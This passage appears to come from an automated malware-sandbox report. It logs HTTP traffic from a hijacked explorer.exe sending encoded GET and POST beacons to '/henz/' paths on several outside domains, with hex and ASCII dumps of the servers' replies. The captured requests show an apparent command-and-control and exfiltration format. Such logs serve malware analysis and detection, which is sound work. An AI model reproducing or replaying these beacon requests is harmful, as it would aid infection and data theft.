3e 3c 68 31 3e e6 9c 8d e5 8a a1 e5 99 a8 e9 94 99 e8 af af 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e
                                                Data Ascii: 620<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset><script>var _hmt = _hmt || [];(function() { var hm = document.
                                                Nov 30, 2022 01:26:11.609267950 CET133INData Raw: 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 64 30 37 36 36 34 31 33 63 36 36 36 65 33 39 34 66
                                                Data Ascii: createElement("script"); hm.src = "https://hm.baidu.com/hm.js?d0766413c666e394f861185086d7f52f"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><script src="http://206.119.1
                                                Nov 30, 2022 01:26:11.609283924 CET133INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.449697206.233.197.13580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 30, 2022 01:25:25.388400078 CET107OUTGET /henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.lyonfinancialusa.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 30, 2022 01:25:25.881593943 CET108INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:25:25 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/8.0.8
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: https://www.lyonfinancialusa.com/henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.449698162.214.129.14980C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 30, 2022 01:25:31.228866100 CET109OUTPOST /henz/ HTTP/1.1
                                                Host: www.afterdarksocial.club
                                                Connection: close
                                                Content-Length: 185
                                                Cache-Control: no-cache
                                                Origin: http://www.afterdarksocial.club
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.afterdarksocial.club/henz/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 34 68 71 3d 78 52 42 4e 59 66 6f 55 79 47 73 48 35 70 57 58 50 6b 34 67 55 52 30 62 31 78 47 6c 43 71 63 4a 6e 59 6f 75 65 4c 76 44 52 72 55 33 4c 74 52 78 78 42 4f 4b 54 58 37 56 68 44 53 6c 43 70 65 6a 56 38 35 48 73 5a 4b 50 31 65 30 39 69 47 6e 2d 6f 31 4c 7a 5a 54 4e 45 43 76 72 32 5a 51 63 57 66 59 35 34 36 45 77 73 4f 4d 41 54 43 73 4d 74 53 42 49 37 47 4f 4a 51 66 32 30 47 45 70 37 30 66 39 31 5f 75 6d 4e 79 4e 75 31 32 74 77 56 64 37 5a 42 4f 4f 71 62 36 35 79 43 5f 53 4c 32 6a 4d 79 37 32 35 65 52 55 37 4f 77 73 68 47 53 56 63 41 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 4hq=xRBNYfoUyGsH5pWXPk4gUR0b1xGlCqcJnYoueLvDRrU3LtRxxBOKTX7VhDSlCpejV85HsZKP1e09iGn-o1LzZTNECvr2ZQcWfY546EwsOMATCsMtSBI7GOJQf20GEp70f91_umNyNu12twVd7ZBOOqb65yC_SL2jMy725eRU7OwshGSVcA).
                                                Nov 30, 2022 01:25:31.398947954 CET110INHTTP/1.1 404 Not Found
                                                Date: Wed, 30 Nov 2022 00:25:31 GMT
                                                Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
                                                Accept-Ranges: bytes
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html
                                                Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 23 62 6f 64 79 2d 63 6f 6e 74 65 6e 74 20 70 20 7b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20
                                                Data Ascii: 1195<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <title>579404 Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> body { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; background-color:#367E8E; scrollbar-base-color: #005B70; scrollbar-arrow-color: #F3960B; scrollbar-DarkShadow-Color: #000000; color: #FFFFFF;margin:0; } a { color:#021f25; text-decoration:none} h1 { font-size: 18px; color: #FB9802; padding-bottom: 10px; background-image: url(sys_cpanel/images/bottombody.jpg); background-repeat: repeat-x; padding:5px 0 10px 15px;margin:0; } #body-content p { padding-left: 25px; padding-right: 25px;
                                                Nov 30, 2022 01:25:31.398994923 CET112INData Raw: 20 20 20 20 20 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a
                                                Data Ascii: line-height: 18px; padding-top: 5px; padding-bottom: 5px; } h2 { font-size: 14px; font-weight: bold; color: #FF9900; padding-left: 15px; } </style> </hea
                                                Nov 30, 2022 01:25:31.399027109 CET112INData Raw: 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: > </body></html>0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.449699162.214.129.14980C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 30, 2022 01:25:33.429382086 CET112OUTGET /henz/?4hq=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/EbwlnLs/kdjkkcQ==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.afterdarksocial.club
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 30, 2022 01:25:33.599673986 CET114INHTTP/1.1 404 Not Found
                                                Date: Wed, 30 Nov 2022 00:25:33 GMT
                                                Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
                                                Accept-Ranges: bytes
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html
                                                Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 23 62 6f 64 79 2d 63 6f 6e 74 65 6e 74 20 70 20 7b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20
                                                Data Ascii: 1195<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <title>579404 Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> body { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; background-color:#367E8E; scrollbar-base-color: #005B70; scrollbar-arrow-color: #F3960B; scrollbar-DarkShadow-Color: #000000; color: #FFFFFF;margin:0; } a { color:#021f25; text-decoration:none} h1 { font-size: 18px; color: #FB9802; padding-bottom: 10px; background-image: url(sys_cpanel/images/bottombody.jpg); background-repeat: repeat-x; padding:5px 0 10px 15px;margin:0; } #body-content p { padding-left: 25px; padding-right: 25px;
                                                Nov 30, 2022 01:25:33.599761009 CET115INData Raw: 20 20 20 20 20 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a
                                                Data Ascii: line-height: 18px; padding-top: 5px; padding-bottom: 5px; } h2 { font-size: 14px; font-weight: bold; color: #FF9900; padding-left: 15px; } </style> </hea
                                                Nov 30, 2022 01:25:33.599796057 CET115INData Raw: 57 65 62 4d 61 73 74 65 72 3c 2f 61 3e 2e 0a 3c 2f 70 3e 0a 3c 68 72 20 2f 3e 0a 0d 0a 65 39 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 32 35 20 28 55 6e 69 78 29 20 6d 6f 64 5f 73 73 6c 2f 32 2e 32 2e 32 35 20 4f 70 65 6e
                                                Data Ascii: WebMaster</a>.</p><hr />e9<address>Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.afterdarksocial.club Port 80</address>... end content --> </


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.449700155.159.61.22180C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 30, 2022 01:25:39.010220051 CET117OUTPOST /henz/ HTTP/1.1
                                                Host: www.patrickguarte.com
                                                Connection: close
                                                Content-Length: 185
                                                Cache-Control: no-cache
                                                Origin: http://www.patrickguarte.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.patrickguarte.com/henz/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 34 68 71 3d 30 72 56 75 73 4f 28 4a 6e 64 6d 42 33 79 67 33 33 31 6c 64 33 47 58 57 33 64 4a 4e 62 61 42 51 37 6e 44 43 46 6b 6d 33 43 67 48 48 37 53 4d 36 72 76 75 47 67 41 5a 47 68 32 57 50 62 49 58 34 56 56 72 4b 4f 62 34 41 51 6f 41 65 31 38 75 43 6e 67 55 4a 57 52 4a 34 28 75 4d 75 76 4c 64 48 79 56 4a 38 50 6c 4b 54 30 4b 6c 59 70 47 46 38 6c 5f 30 42 45 76 4e 37 78 77 7a 4c 6c 5f 4f 6b 72 45 32 69 66 6e 64 45 6b 6c 55 52 5a 57 34 74 65 6b 4e 33 67 53 6d 47 61 63 31 43 47 36 33 69 6e 33 53 33 41 36 71 70 49 52 49 44 4e 46 7e 47 49 41 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 4hq=0rVusO(JndmB3yg331ld3GXW3dJNbaBQ7nDCFkm3CgHH7SM6rvuGgAZGh2WPbIX4VVrKOb4AQoAe18uCngUJWRJ4(uMuvLdHyVJ8PlKT0KlYpGF8l_0BEvN7xwzLl_OkrE2ifndEklURZW4tekN3gSmGac1CG63in3S3A6qpIRIDNF~GIA).
                                                Nov 30, 2022 01:25:39.220068932 CET117INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:25:39 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.449701155.159.61.22180C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 30, 2022 01:25:41.267249107 CET118OUTGET /henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.patrickguarte.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 30, 2022 01:25:41.493326902 CET118INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:25:41 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.4497022.57.90.1680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 30, 2022 01:25:54.144684076 CET120OUTPOST /henz/ HTTP/1.1
                                                Host: www.brennancorps.info
                                                Connection: close
                                                Content-Length: 185
                                                Cache-Control: no-cache
                                                Origin: http://www.brennancorps.info
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.brennancorps.info/henz/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 34 68 71 3d 43 36 36 7a 31 2d 46 33 50 30 6d 6f 65 62 4e 7a 7e 51 71 50 73 58 72 32 61 6b 65 42 31 62 43 41 6e 53 55 34 33 45 57 56 36 47 38 51 75 69 53 77 4b 78 55 5a 6d 32 77 6a 55 6a 77 6b 7a 66 75 54 6e 37 57 47 44 32 64 6d 59 52 64 38 52 4a 6a 62 62 50 55 4e 6b 69 49 58 75 42 41 6c 68 39 74 51 6c 72 42 51 56 52 4c 62 6e 50 6f 79 46 49 65 43 56 69 73 32 79 4d 59 73 55 32 49 66 73 4b 69 4b 66 63 31 64 35 65 4e 5f 61 39 53 2d 44 4c 72 4a 54 30 77 6f 41 6a 42 53 51 4a 37 68 6c 41 56 34 61 4f 37 69 65 4e 44 32 59 71 6a 41 33 6d 47 31 67 77 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 4hq=C66z1-F3P0moebNz~QqPsXr2akeB1bCAnSU43EWV6G8QuiSwKxUZm2wjUjwkzfuTn7WGD2dmYRd8RJjbbPUNkiIXuBAlh9tQlrBQVRLbnPoyFIeCVis2yMYsU2IfsKiKfc1d5eN_a9S-DLrJT0woAjBSQJ7hlAV4aO7ieND2YqjA3mG1gw).
                                                Nov 30, 2022 01:25:54.177197933 CET120INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:25:54 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                8192.168.2.4497032.57.90.1680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Nov 30, 2022 01:25:56.204452991 CET121OUTGET /henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.brennancorps.info
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 30, 2022 01:25:56.240652084 CET121INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:25:56 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


